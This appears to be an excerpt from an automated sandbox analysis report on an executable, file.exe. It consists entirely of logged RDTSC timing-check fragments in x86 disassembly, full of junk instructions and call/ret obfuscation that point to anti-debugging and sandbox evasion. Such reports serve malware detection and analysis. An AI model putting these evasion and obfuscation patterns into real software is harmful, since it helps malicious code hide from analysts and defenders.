Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109C8FF second address: 109C964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08ED2385EDh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edx 0x0000000f jmp 00007F08ED2385F3h 0x00000014 pop edx 0x00000015 push eax 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop eax 0x00000019 popad 0x0000001a nop 0x0000001b sub bx, 01DCh 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007F08ED2385E8h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 00000018h 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c push 00000000h 0x0000003e or di, B881h 0x00000043 xchg eax, esi 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109C964 second address: 109C968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109C968 second address: 109C975 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F08ED2385E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109CAD3 second address: 109CB68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b jg 00007F08ED2F2E8Ch 0x00000011 pop edi 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F08ED2F2E88h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d push dword ptr fs:[00000000h] 0x00000034 mov ebx, ecx 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d push 00000000h 0x0000003f push eax 0x00000040 call 00007F08ED2F2E88h 0x00000045 pop eax 0x00000046 mov dword ptr [esp+04h], eax 0x0000004a add dword ptr [esp+04h], 0000001Ah 0x00000052 inc eax 0x00000053 push eax 0x00000054 ret 0x00000055 pop eax 0x00000056 ret 0x00000057 mov bh, cl 0x00000059 mov ebx, 55098B78h 0x0000005e mov eax, dword ptr [ebp+122D05BDh] 0x00000064 mov bx, dx 0x00000067 push FFFFFFFFh 0x00000069 mov ebx, dword ptr [ebp+122D3B19h] 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 pushad 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109CB68 second address: 109CB6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109CB6E second address: 109CB73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 104F424 second address: 104F42A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A0E75 second address: 10A0E7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A0E7C second address: 10A0EDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F08ED2385E8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov bx, si 0x00000027 push 00000000h 0x00000029 call 00007F08ED2385EDh 0x0000002e add ebx, 27314D9Ah 0x00000034 pop ebx 0x00000035 push 00000000h 0x00000037 mov ebx, dword ptr [ebp+122D2CB1h] 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F08ED2385F1h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A0EDE second address: 10A0EE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A0EE2 second address: 10A0EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A0EE8 second address: 10A0EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F08ED2F2E86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A1E82 second address: 10A1E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edi 0x00000007 pushad 0x00000008 jmp 00007F08ED2385EDh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A1E99 second address: 10A1EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D2B73h], eax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F08ED2F2E88h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b or di, 1491h 0x00000030 mov di, dx 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F08ED2F2E92h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A1001 second address: 10A1005 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A1EE7 second address: 10A1EF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A10E0 second address: 10A10ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A5156 second address: 10A51AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ebx, ecx 0x0000000f jnl 00007F08ED2F2E92h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F08ED2F2E88h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 sub di, 041Ah 0x00000036 push 00000000h 0x00000038 mov dword ptr [ebp+122D2E37h], ebx 0x0000003e xchg eax, esi 0x0000003f push ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 js 00007F08ED2F2E86h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A52EF second address: 10A52FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2385EBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A77EB second address: 10A7869 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F08ED2F2E97h 0x00000008 jmp 00007F08ED2F2E91h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F08ED2F2E88h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d pushad 0x0000002e mov si, dx 0x00000031 mov ax, 2BF4h 0x00000035 popad 0x00000036 push 00000000h 0x00000038 jmp 00007F08ED2F2E8Eh 0x0000003d push 00000000h 0x0000003f push edi 0x00000040 sub dword ptr [ebp+122D1E1Bh], eax 0x00000046 pop ebx 0x00000047 push eax 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A7869 second address: 10A7888 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F08ED2385F7h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A8802 second address: 10A8808 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AADBF second address: 10AADC4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A89A0 second address: 10A89BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F08ED2F2E92h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10ABF26 second address: 10ABFC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F08ED2385F2h 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F08ED2385E8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 jne 00007F08ED2385ECh 0x0000002c push 00000000h 0x0000002e mov edi, dword ptr [ebp+122D3DA1h] 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edx 0x00000039 call 00007F08ED2385E8h 0x0000003e pop edx 0x0000003f mov dword ptr [esp+04h], edx 0x00000043 add dword ptr [esp+04h], 0000001Bh 0x0000004b inc edx 0x0000004c push edx 0x0000004d ret 0x0000004e pop edx 0x0000004f ret 0x00000050 or ebx, 3E2AAD51h 0x00000056 mov bl, cl 0x00000058 push eax 0x00000059 pushad 0x0000005a jmp 00007F08ED2385F9h 0x0000005f push eax 0x00000060 push edx 0x00000061 ja 00007F08ED2385E6h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A89BC second address: 10A89C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A89C2 second address: 10A8A4F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov ebx, 7F5E5666h 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov dword ptr [ebp+122D2E1Dh], esi 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F08ED2385E8h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 00000018h 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c mov di, ax 0x0000003f mov dword ptr [ebp+122D2B0Ah], edi 0x00000045 mov eax, dword ptr [ebp+122D08A5h] 0x0000004b push 00000000h 0x0000004d push edi 0x0000004e call 00007F08ED2385E8h 0x00000053 pop edi 0x00000054 mov dword ptr [esp+04h], edi 0x00000058 add dword ptr [esp+04h], 00000015h 0x00000060 inc edi 0x00000061 push edi 0x00000062 ret 0x00000063 pop edi 0x00000064 ret 0x00000065 push FFFFFFFFh 0x00000067 mov di, dx 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007F08ED2385F7h 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A8A4F second address: 10A8A54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AB0DF second address: 10AB0FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F08ED2385F2h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AB0FA second address: 10AB100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AFEF4 second address: 10AFF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F08ED2385E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AFF03 second address: 10AFF07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AF02B second address: 10AF04F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F08ED2385F2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AF04F second address: 10AF0C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov ebx, dword ptr [ebp+122D358Dh] 0x00000010 push esi 0x00000011 mov ebx, edi 0x00000013 pop ebx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b sub dword ptr [ebp+122D1DFFh], edi 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 jc 00007F08ED2F2E86h 0x0000002e mov eax, dword ptr [ebp+122D1249h] 0x00000034 push 00000000h 0x00000036 push ebp 0x00000037 call 00007F08ED2F2E88h 0x0000003c pop ebp 0x0000003d mov dword ptr [esp+04h], ebp 0x00000041 add dword ptr [esp+04h], 00000018h 0x00000049 inc ebp 0x0000004a push ebp 0x0000004b ret 0x0000004c pop ebp 0x0000004d ret 0x0000004e adc bh, FFFFFFABh 0x00000051 push FFFFFFFFh 0x00000053 mov dword ptr [ebp+1246C904h], ebx 0x00000059 nop 0x0000005a push eax 0x0000005b push edx 0x0000005c jnc 00007F08ED2F2E88h 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AF0C9 second address: 10AF0CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10593E9 second address: 1059407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F08ED2F2E95h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BA874 second address: 10BA87E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F08ED2385E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BA87E second address: 10BA89B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2F2E99h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C18C0 second address: 10C18E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [esp+04h] 0x00000008 jmp 00007F08ED2385F5h 0x0000000d mov eax, dword ptr [eax] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C18E5 second address: 10C18E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C18E9 second address: 10C18EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C19F9 second address: 10C1A1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C1A1C second address: 10C1A2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C1A2C second address: 10C1A69 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F08ED2F2E88h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edx 0x0000000f jnc 00007F08ED2F2E9Fh 0x00000015 pop edx 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a jno 00007F08ED2F2E88h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C1B37 second address: 10C1B3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C57D1 second address: 10C57DB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F08ED2F2E86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C57DB second address: 10C57F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F08ED2385F5h 0x0000000c jmp 00007F08ED2385EFh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C57F6 second address: 10C57FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C57FC second address: 10C5800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C5800 second address: 10C5806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C5806 second address: 10C5812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C631D second address: 10C6321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CB0EC second address: 10CB0F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CB0F1 second address: 10CB0F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CB0F9 second address: 10CB102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1050DF7 second address: 1050E07 instructions: 0x00000000 rdtsc 0x00000002 je 00007F08ED2F2E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1050E07 second address: 1050E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CB277 second address: 10CB27D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CB3D7 second address: 10CB421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a je 00007F08ED2385E6h 0x00000010 jg 00007F08ED2385E6h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F08ED2385F1h 0x0000001d popad 0x0000001e pop ebx 0x0000001f jnp 00007F08ED23861Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 jne 00007F08ED2385E6h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CB6ED second address: 10CB701 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CB701 second address: 10CB725 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F08ED2385F6h 0x00000008 ja 00007F08ED2385E6h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CAE30 second address: 10CAE39 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CC077 second address: 10CC07D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CC07D second address: 10CC081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D83C8 second address: 10D83CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D6DAE second address: 10D6DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D6DB6 second address: 10D6DBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D6DBA second address: 10D6DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D7229 second address: 10D7236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007F08ED2385E8h 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D7236 second address: 10D729A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F08ED2F2E9Ch 0x00000008 je 00007F08ED2F2E86h 0x0000000e jmp 00007F08ED2F2E90h 0x00000013 jnc 00007F08ED2F2E8Ah 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c jmp 00007F08ED2F2E98h 0x00000021 jmp 00007F08ED2F2E97h 0x00000026 jne 00007F08ED2F2E8Eh 0x0000002c push edx 0x0000002d pop edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D7435 second address: 10D7439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D756E second address: 10D7572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D7572 second address: 10D7578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D7A22 second address: 10D7A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D7A27 second address: 10D7A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D7CB0 second address: 10D7CCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F08ED2F2E98h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
